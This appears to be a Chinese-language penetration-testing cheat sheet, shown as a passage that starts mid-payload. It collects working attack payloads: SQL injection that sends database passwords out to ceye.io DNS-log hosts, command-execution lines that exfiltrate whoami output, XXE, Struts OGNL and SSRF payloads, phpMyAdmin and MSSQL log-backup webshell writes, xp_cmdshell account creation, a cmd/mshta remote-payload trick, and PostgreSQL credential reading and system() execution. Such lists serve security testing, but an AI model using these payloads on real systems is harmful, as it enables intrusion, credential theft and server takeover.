E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';EXECUTE exec_cmd;END;$$ LANGUAGE plpgSQL SECURITY DEFINER;SELECT temp_function(); Oracle ?id=1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL; ?id=1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL; ?id=1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL; ?id=1 union SELECT UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL; 命令执行 >curl http://0ox095.ceye.io/`whoami` >ping `whoami`.b182oj.ceye.io >ping %CD%.lfofz7.dnslog.cn & cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io && nslookup !FINAL!" XXE <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://b182oj.ceye.io/xxe_test"> %remote;]> <root/> Struts xx.action?redirect:http://b182oj.ceye.io/%25{3*4} xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} weblogic /uddiexplorer/SearchPublicRegistries.jsp?operator=http://b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search Resin xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://b182oj.ceye.io/ssrf Discuz /forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo PHPMyadmin LOG show variables like '%general%'; #查看配置 set global general_log = on; #开启general log模式 set global general_log_file = '/var/www/html/1.php'; select '<?php eval($_POST[cmd]);?>' 慢查询 show variables like '%slow%'; set GLOBAL slow_query_log_file='C:/WWW/slow.php'; set GLOBAL slow_query_log=on; set GLOBAL log_queries_not_using_indexes=on; select '<?php phpinfo();?>' from mysql.db where sleep(10); 任意文件读取 phpMyAdmin 2.x POST /scripts/setup.php HTTP/1.1 Host: ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} LFI phpMyAdmin 4.0.1--4.2.12,PHP < 5.3.4 /gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00 phpMyAdmin 4.8.0和4.8.1 后台权限 >select '<?php phpinfo();exit;?>' /index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_*** RCE PhpMyAdmin 4.0.x-4.6.2,PHP 4.3.0-5.4.6后台权限 >cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');" phpMyAdmin 4.8.0~4.8.3 CREATE DATABASE foo; CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY ); INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>'; 访问http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo INSERT INTO pma__column_infoSELECT '1', 'foo', 'bar', 'baz', 'plop', 'plop', 'plop', 'plop','../../../../../../../../tmp/sess_***','plop'; 访问 /tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 PHP-FPM RCE >git clone https://github.com/neex/phuip-fpizdam.git >cd phuip-fpizdam >go get -v && go build >go run . http://127.0.0.1/index.php http://127.0.0.1/index.php?a=id 多执行几次 phpstudy后门 php:5.2.17 5.4.45 ![]() GET / HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding:gzip,deflate Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw== Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Length: 2 cmdhijack From: https://hackingiscool.pl/ poc完整的命令行 cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe" 可能产生的影响 包括拒绝服务,信息泄露,任意代码执行(取决于目标应用程序和系统)。 以web应用为例 image 由于使用了escapeshellcmd(),不易受命令注入的影响,使用本方法 一个poc image image 不限于任何位置,文件 image 再扩展一下 如,powershell带-enc执行,或mshta等方法,可参考 https://lolbas-project.github.io/,但是依照windows的特性,在无法将完整字符串解析为有效路径的情况下,会拆分空格后面的内容,这里可以使用&符号 如: >cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&powershell -enc xxxx" >cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&mshta http://192.168.0.105:8080/xsuUEWJ.hta" image Database MSSQL 判断数据库 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 查库 ?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0 -- ?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 -- 查表 import requests import re table_list = [''] def get_sqlserver_table(table_list, table_num): for num in range(0,table_num): # print("','".join(table_list)) sql_str = "and (select top 1 name from [xxxx].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('{}'))>0".format("','".join(table_list)) url = "http://www.xxxxx.cn/x.aspx?cid=1' {} AND 'aNmV'='aNmV".format(sql_str) r = requests.get(url, headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}) res = re.search(r'\'(.*)\'', r.content.decode('utf-8'), re.M|re.I) table_name = str(res.group(1)) table_list.append(table_name) print("[{}] - TableName: {}".format(str(r.status_code), table_name)) if __name__ == "__main__": get_sqlserver_table(table_list, 16) 判断是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') 执行命令 ;exec master..xp_cmdshell "net user name password /add"— 查看权限 and (select IS_SRVROLEMEMBER('sysadmin'))=1-- //sa and (select IS_MEMBER('db_owner'))=1-- // dbo and (select IS_MEMBER('public'))=1-- //public 站库分离获取服务器IP ;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;-- LOG备份 ;alter database testdb set RECOVERY FULL -- ;create table cmd (a image) -- ;backup log testdb to disk = 'c:\wwwroot\shell.asp' with init -- ;insert into cmd (a) values ('<%%25Execute(request("chopper"))%%25>')-- ;backup log testdb to disk = 'c:\wwwroot\shell.asp' – 2000差异备份 ;backup database testdb to disk ='c:\wwwroot\bak.bak';-- ;create table [dbo].[testtable] ([cmd] [image]);-- ;insert into testtable (cmd) values(木马hex编码);-- ;backup database testdb to disk='c:\wwwroot\upload\shell.asp' WITH DIFFERENTIAL,FORMAT;-- 2005差异备份 ;alter/**/database/**/[testdb]/**/set/**/recovery/**/full— ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[testdb]/**/to/**/disk=@d/**/with/**/init-- ;create/**/table/**/[itpro]([a]/**/image)— ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init-- ;insert/**/into/**/[itpro]([a])/**/values(木马hex编码)— ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=木马保存路径的SQL_EN编码/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init-- ;drop/**/table/**/[itpro]— ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init-- PostgreSQL 连接 >psql -U dbuser -d exampledb -h 127.0.0.1 -p 5432 查看版本 >select version(); 列出数据库 >select datname from pg_database; 列出所有表名 >select * from pg_tables; 读取账号秘密 >select usename,passwd from pg_shadow; 当前用户 >select user; 修改密码 >alter user postgres with password '123456'; 列目录 >select pg_ls_dir('/etc'); 读文件 >select pg_read_file('postgresql.auto.conf',0,100); #行数 & >drop table wooyun; >create table wooyun(t TEXT); >copy wooyun FROM '/etc/passwd'; >select * from wooyun limit 1 offset 0; & >select lo_import('/etc/passwd',12345678); >select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a; 写文件 create table shell(shell text not null); insert into shell values($$<?php @eval($_POST[1]);?>$$); copy shell(shell) to '/var/www/html/shell.php'; & copy (select '<?php phpinfo();?>') to '/var/www/html/shell.php'; 爆破 MSF>use auxiliary/scanner/postgres/postgres_login 执行命令版本8.2以下 >create function system(cstring) returns int AS '/lib/libc.so.6', 'system' language C strict; >create function system(cstring) returns int AS '/lib64/libc.so.6', 'system' language C strict; >select system('id'); 下载地址 |